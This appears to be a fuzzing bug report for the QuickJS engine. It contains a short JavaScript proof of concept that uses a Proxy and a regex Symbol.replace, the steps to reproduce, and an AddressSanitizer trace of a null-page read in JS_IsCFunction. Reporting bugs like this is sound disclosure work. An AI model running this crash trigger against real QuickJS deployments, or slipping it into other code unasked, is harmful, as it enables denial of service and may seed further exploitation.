OOB in JS_IsCFunction

[7331akasokoan]

POC:

/a/.test("");
const v0 = /x/g;
const v1 = {
    get(v2, v3) {
        Object.defineProperty(v2, "flags", {get: undefined, configurable: true});
        /y/g[Symbol.replace].apply(v0);
    }
};
const v4 = new Proxy(v0, v1);
v4.z;

Step:

1. Build QuickJS with ASAN
2. ./qjs --std ./poc.js

Crash:

=================================================================
==3218064==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000006 (pc 0x563f754d1b5e bp 0x7ffd7f8bd8f0 sp 0x7ffd7f8bd8e0 T0)
==3218064==The signal is caused by a READ memory access.
==3218064==Hint: address points to the zero page.
    #0 0x563f754d1b5e in JS_IsCFunction /home/fuzz/quickjs/quickjs.c:10576:21
    #1 0x563f754d1b5e in check_regexp_getter /home/fuzz/quickjs/quickjs.c:48111:12
    #2 0x563f754c90bb in js_is_standard_regexp /home/fuzz/quickjs/quickjs.c:48144:10
    #3 0x563f754c90bb in js_regexp_Symbol_replace /home/fuzz/quickjs/quickjs.c:48194:31
    #4 0x563f753e5150 in js_call_c_function /home/fuzz/quickjs/quickjs.c:17250:19
    #5 0x563f75419079 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17445:16
    #6 0x563f7548a810 in JS_Call /home/fuzz/quickjs/quickjs.c:20148:12
    #7 0x563f7548a810 in js_function_apply /home/fuzz/quickjs/quickjs.c:40644:16
    #8 0x563f753e5290 in js_call_c_function /home/fuzz/quickjs/quickjs.c:17263:19
    #9 0x563f75419079 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17445:16
    #10 0x563f7541c3e1 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17849:27
    #11 0x563f754dd26d in JS_CallFree /home/fuzz/quickjs/quickjs.c:20155:19
    #12 0x563f754dd26d in js_proxy_get /home/fuzz/quickjs/quickjs.c:50138:11
    #13 0x563f754015e1 in JS_GetPropertyInternal /home/fuzz/quickjs/quickjs.c:7922:34
    #14 0x563f7542e868 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:18786:13
    #15 0x563f7543cab0 in JS_CallFree /home/fuzz/quickjs/quickjs.c:20155:19
    #16 0x563f7543cab0 in JS_EvalFunctionInternal /home/fuzz/quickjs/quickjs.c:36578:19
    #17 0x563f75457b9a in __JS_EvalInternal /home/fuzz/quickjs/quickjs.c:36711:19
    #18 0x563f7543d61d in JS_EvalInternal /home/fuzz/quickjs/quickjs.c:36737:11
    #19 0x563f7543d61d in JS_EvalThis /home/fuzz/quickjs/quickjs.c:36771:11
    #20 0x563f7543d7e8 in JS_Eval /home/fuzz/quickjs/quickjs.c:36779:12
    #21 0x563f753e2e7a in eval_buf /home/fuzz/quickjs/qjs.c:66:15
    #22 0x563f753e2597 in eval_file /home/fuzz/quickjs/qjs.c:101:11
    #23 0x563f753e2597 in main /home/fuzz/quickjs/qjs.c:519:17
    #24 0x7f8923bc0d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #25 0x7f8923bc0e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #26 0x563f752fa714 in _start (/home/fuzz/quickjs/qjs+0x59714)
==3218064==Register values:
rax = 0x0000000000000000  rbx = 0x0000000000000000  rcx = 0x0000000000000000  rdx = 0x0000563f754c3a00
rdi = 0x0000000000000000  rsi = 0x0000000000000006  rbp = 0x00007ffd7f8bd8f0  rsp = 0x00007ffd7f8bd8e0
 r8 = 0x0000000000000000   r9 = 0x0000000040000000  r10 = 0x00007c09230e5ef0  r11 = 0x0000000000000071
r12 = 0x00007b8921fe7780  r13 = 0x00000f7f2461ce78  r14 = 0x00007bf9230e73a6  r15 = 0x00000f7f2461ce74
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/quickjs/quickjs.c:10576:21 in JS_IsCFunction
==3218064==ABORTING